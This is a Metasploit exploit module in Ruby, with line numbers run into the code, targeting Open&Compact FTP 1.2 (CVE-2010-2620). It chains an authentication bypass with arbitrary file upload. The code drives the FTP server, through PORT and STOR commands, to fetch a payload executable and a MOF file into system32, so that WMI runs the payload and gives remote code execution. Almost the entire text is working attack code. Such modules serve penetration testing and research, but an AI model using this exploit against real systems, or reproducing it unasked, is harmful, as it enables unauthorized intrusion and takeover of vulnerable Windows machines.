Path: blob/master/modules/exploits/windows/ftp/open_ftpd_wbem.rb
19664 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::Ftp9include Msf::Exploit::Remote::TcpServer10include Msf::Exploit::EXE11include Msf::Exploit::WbemExec12include Msf::Exploit::FileDropper1314def initialize(info = {})15super(16update_info(17info,18'Name' => "Open-FTPD 1.2 Arbitrary File Upload",19'Description' => %q{20This module exploits multiple vulnerabilities found in Open&Compact FTP21server. The software contains an authentication bypass vulnerability and a22arbitrary file upload vulnerability that allows a remote attacker to write23arbitrary files to the file system as long as there is at least one user24who has permission.2526Code execution can be achieved by first uploading the payload to the remote27machine as an exe file, and then upload another mof file, which enables28WMI (Management Instrumentation service) to execute the uploaded payload.29Please note that this module currently only works for Windows before Vista.30},31'License' => MSF_LICENSE,32'Author' => [33'Serge Gorbunov', # Initial discovery34'bcoles', # Metasploit35],36'References' => [37['OSVDB', '65687'],38['EDB', '13932'],39['CVE', '2010-2620']40],41'Payload' => {42'BadChars' => "\x00",43},44'Platform' => 'win',45'Stance' => Msf::Exploit::Stance::Aggressive,46'Targets' => [47# Tested on version 1.2 - Windows XP SP3 (EN)48['Open&Compact FTP 1.2 on Windows (Before Vista)', {}]49],50'Privileged' => true,51'DisclosureDate' => '2012-06-18',52'DefaultTarget' => 0,53'Notes' => {54'Reliability' => UNKNOWN_RELIABILITY,55'Stability' => UNKNOWN_STABILITY,56'SideEffects' => UNKNOWN_SIDE_EFFECTS57}58)59)6061register_options([62OptString.new('PATH', [true, 'The local Windows path', "C:/WINDOWS/"]),63OptPort.new('SRVPORT', [true, 'The local port to listen on for active mode', 8080])64])65deregister_options('FTPUSER', 'FTPPASS') # Using authentication bypass66end6768def check69connect70disconnect7172if banner =~ /\*\* Welcome on \*\*/73return Exploit::CheckCode::Detected74else75return Exploit::CheckCode::Unknown76end77end7879def on_client_connect(cli)80peer = "#{cli.peerhost}:#{cli.peerport}"8182case @stage83when :exe84print_status("Sending executable (#{@exe.length.to_s} bytes)")85cli.put(@exe)86@stage = :mof87when :mof88print_status("Sending MOF (#{@mof.length.to_s} bytes)")89cli.put(@mof)90end9192cli.close93end9495# Largely stolen from freefloatftp_wbem.rb96def upload(filename)97select(nil, nil, nil, 1)9899peer = "#{rhost}:#{rport}"100print_status("Trying to upload #{::File.basename(filename)}")101conn = connect(false, datastore['VERBOSE'])102if not conn103fail_with(Failure::Unreachable, "#{@peer} - Connection failed")104end105106# Switch to binary mode107print_status("Set binary mode")108send_cmd(['TYPE', 'I'], true, conn)109110# Prepare active mode: Get attacker's IP and source port111src_ip = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['SRVHOST']112src_port = datastore['SRVPORT'].to_i113114# Prepare active mode: Convert the IP and port for active mode115src_ip = src_ip.gsub(/\./, ',')116src_port = "#{src_port / 256},#{src_port.remainder(256)}"117118# Set to active mode119print_status("Set active mode \"#{src_ip},#{src_port}\"")120send_cmd(['PORT', "#{src_ip},#{src_port}"], true, conn)121122# Tell the FTP server to download our file123send_cmd(['STOR', filename], false, conn)124125print_good("Upload successful")126disconnect(conn)127end128129# Largely stolen from freefloatftp_wbem.rb130def exploit131path = datastore['PATH']132exe_name = "#{path}/system32/#{rand_text_alpha(rand(10) + 5)}.exe"133mof_name = "#{path}/system32/wbem/mof/#{rand_text_alpha(rand(10) + 5)}.mof"134@mof = generate_mof(::File.basename(mof_name), ::File.basename(exe_name))135@exe = generate_payload_exe136@stage = :exe137138begin139t = framework.threads.spawn("reqs", false) {140begin141# Upload our malicious executable142u = upload(exe_name)143# Upload the mof file144upload(mof_name) if u145register_file_for_cleanup("#{::File.basename(exe_name)}")146register_file_for_cleanup("wbem\\mof\\good\\#{::File.basename(mof_name)}")147rescue ::Exception => e148print_error "Upload Failed: #{e.message}"149cleanup150end151}152153super154ensure155t.kill156end157end158end159160161